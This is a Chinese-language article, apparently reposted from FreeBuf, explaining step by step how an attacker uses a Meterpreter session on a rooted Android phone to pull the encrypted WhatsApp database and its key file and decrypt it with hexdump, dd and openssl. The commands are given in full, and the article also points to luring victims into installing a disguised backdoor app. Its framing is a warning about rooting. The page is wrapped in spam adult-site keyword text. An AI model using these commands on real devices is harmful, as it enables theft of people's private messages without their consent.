成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

攻擊者是如何一步步拿下你的WhatsApp數(shù)據(jù)庫

安全 數(shù)據(jù)安全 黑客攻防
針對已root過的安卓移動設(shè)備,本文主要講解遠(yuǎn)程攻擊并解密WhatsApp數(shù)據(jù)庫的詳細(xì)過程。另外,這再一次提醒我們,對移動設(shè)備進(jìn)行root(安卓)或越獄(iOS),將使用戶暴露在黑客攻擊之下。

針對已root過的安卓移動設(shè)備,本文主要講解遠(yuǎn)程攻擊并解密WhatsApp數(shù)據(jù)庫的詳細(xì)過程。另外,這再一次提醒我們,對移動設(shè)備進(jìn)行root(安卓)或越獄(iOS),將使用戶暴露在黑客攻擊之下。

[[151157]]

幾小時前,網(wǎng)絡(luò)上發(fā)布了一個有趣的文章《如何遠(yuǎn)程破解并解密WhatsApp數(shù)據(jù)庫[ROOT] 》,文中解釋了如何從一個root過的安卓系統(tǒng)中提取并解密WhatsApp數(shù)據(jù)庫。盡管通常情況下WhatsApp非常安全,但對安卓設(shè)備的root處理將可能使用戶暴露在攻擊風(fēng)險之中。

接下來,就讓我們一步一步看看作者(使用匿名F.E.A.R.)所提出的攻擊場景。

步驟1:利用并獲取安卓設(shè)備的訪問權(quán)限

正如這篇指南中所解釋的,如果安卓設(shè)備通過使用Meterpeter命令進(jìn)行了root,那么這一階段將變得很簡單。

攻擊者是如何一步步拿下你的WhatsApp數(shù)據(jù)庫 

攻擊者是如何一步步拿下你的WhatsApp數(shù)據(jù)庫

為了攻擊并解密WhatsApp數(shù)據(jù)庫,攻擊者需要一個存在于數(shù)據(jù)文件夾中的密鑰文件,而訪問該文件的唯一途徑就是擁有root權(quán)限。此外,該密鑰文件是解密WhatsApp數(shù)據(jù)庫所必不可少的。

步驟2:下載數(shù)據(jù)庫

使用下列命令通過Meterpreter下載數(shù)據(jù)庫:

cd /
cd /sdcard/WhatsApp
ls (打印當(dāng)前目錄)
cd Databases

下載msgstore.db.crypt8 (這里需要耗費一些時間,可能很長)

攻擊者是如何一步步拿下你的WhatsApp數(shù)據(jù)庫

 

步驟3:提取解密密鑰

解密WhatsApp數(shù)據(jù)庫所必需的密鑰文件中存儲了兩套解密密鑰,即實際的加密密鑰K和一個名為IV的初始化向量。值得一提的是,WhatsApp密鑰文件存儲在一個安全的位置。下面這些都是提取密鑰文件的命令:

shell
su(超級用戶訪問或僅僅進(jìn)行提權(quán))

正如F.E.A.R.所解釋的,這是最困難的部分,特別是如果目標(biāo)手機(jī)用戶是有經(jīng)驗且熟練的用戶,因為他必須已經(jīng)安裝SuperSU應(yīng)用程序。

如何誘導(dǎo)受害者安裝SuperSU?

可以看一下用戶bart發(fā)布的這篇教程,里面解釋了如何偽裝一個后門應(yīng)用程序。不過,如果下列場景中的受害者并非是一個有經(jīng)驗的或熟練的用戶,那么事情將變得更加簡單:

1、他們沒有安裝SuperSU應(yīng)用程序。

2、對于新安裝的應(yīng)用,他們沒有改變設(shè)置為PROMPT,而并非GRANT。

執(zhí)行以下命令來訪問密鑰文件夾,并提取解密密鑰。

cd /
cd /data/data
ls
cd com.whatsapp ls
cd files
ls cp key /sdcard/Download (意思是將文件key拷貝到/sdcard/Download文件夾)

步驟4:下載解密密鑰文件到root目錄

下載提取的密鑰文件到root目錄,該目錄中還含有加密的WhatsApp數(shù)據(jù)庫:

cd /
cd /sdcard/Download
download key
rm key (確保你刪除了key文件)

步驟5:解密WhatsApp數(shù)據(jù)庫

文章中報道了2種不同的方法來解密WhatsApp:

(1)使用Linux命令:每次復(fù)制并粘貼一條命令,不要將它們寫成一個腳本文件,否則它將不能正常工作:

hexdump -e '2/1 "%02x"' key | cut -b 253-316 > aes.txt
hexdump -n 67 -e '2/1 "%02x"' msgstore.db.crypt8 | cut -b 103-134 > iv.txt
dd if=msgstore.db.crypt8 of=msgstore.db.crypt8.nohdr ibs=67 skip=1
openssl enc -aes-256-cbc -d -nosalt -nopad -bufsize 16384 -in msgstore.db.crypt8.nohdr -K $(cat aes.txt) -iv $(cat iv.txt) > msgstore.gz
gzip -cdq msgstore.gz > msgstore.db

如果第4行命令不能工作,那么就按下面的指令操作:

hexdump -e ‘2/1 “%02x”‘ key | cut -b 253-316
hexdump -n 67 -e ‘2/1 “%02x”‘ msgstore.db.crypt8 | cut -b 103-134
openssl enc -aes-256-cbc -d -nosalt -nopad -bufsize 16384 -in msgstore.db.crypt8.nohdr -K (從第1條指令中粘貼文本文檔) -iv (從第2條指令中粘貼文本文檔) > msgstore.gz

(2)第二種方法基于簡單的Windows WhatsApp查看器應(yīng)用程序,可以看一下原文。

這是又一次的教訓(xùn),對移動設(shè)備進(jìn)行root(安卓)或越獄(iOS),將使用戶暴露在黑客攻擊之下。

責(zé)任編輯:藍(lán)雨淚 來源: FreeBuf
相關(guān)推薦

2018-07-13 15:36:52

2024-08-30 08:30:29

CPU操作系統(tǒng)寄存器

2024-09-30 09:56:59

2017-01-19 21:08:33

iOS路由構(gòu)建

2017-12-25 11:50:57

LinuxArch Linux

2024-02-04 09:45:56

2024-08-06 09:29:54

程序機(jī)器指令字符串

2019-03-05 14:09:27

Docker存儲容器

2019-07-09 15:23:22

Docker存儲驅(qū)動

2018-12-24 10:04:06

Docker存儲驅(qū)動

2025-04-03 01:45:00

2025-03-28 09:39:15

CPU指令信號

2009-12-17 16:36:23

無線路由設(shè)置密碼

2020-11-09 07:35:59

MySQL數(shù)據(jù)庫業(yè)務(wù)

2019-04-01 10:15:02

2010-03-04 16:28:17

Android核心代碼

2016-11-02 18:54:01

javascript

2025-04-30 04:20:00

操作系統(tǒng)虛擬內(nèi)存

2017-01-06 15:13:25

LinuxVim源代碼

2015-07-27 16:06:16

VMware Thin虛擬化
點贊
收藏

51CTO技術(shù)棧公眾號

主站蜘蛛池模板: 亚洲精品一区二区 | 免费久久网站 | 国产av毛片 | 国产精品观看 | 午夜精品视频在线观看 | 91免费看片 | 久久久久国产精品一区二区 | 亚洲女人天堂成人av在线 | 超碰最新在线 | 欧美午夜精品久久久久免费视 | 国产不卡视频 | 在线观看免费观看在线91 | 色综合一区二区三区 | 欧美精品在线观看 | 91精品国产综合久久久久久蜜臀 | 精品九九 | 天天看片天天干 | 91精品综合久久久久久五月天 | 日产久久| 欧美性大战xxxxx久久久 | 亚洲九九精品 | 四色成人av永久网址 | 一区二区三区精品视频 | 91精品国产91久久综合桃花 | 亚洲在线一区二区 | 日本涩涩视频 | 亚洲国产精品激情在线观看 | 精品国产视频在线观看 | 国产日韩久久久久69影院 | 日韩免费中文字幕 | 高清一区二区 | 久久精品色欧美aⅴ一区二区 | 国产一区二区三区精品久久久 | 超碰最新在线 | 一区二区三区国产视频 | 一级黄色夫妻生活 | 国产精品久久久一区二区三区 | 中文字幕二区三区 | 欧美一区二区三区视频在线 | 青青草av网站 | 国产精品99久久久久久久久 |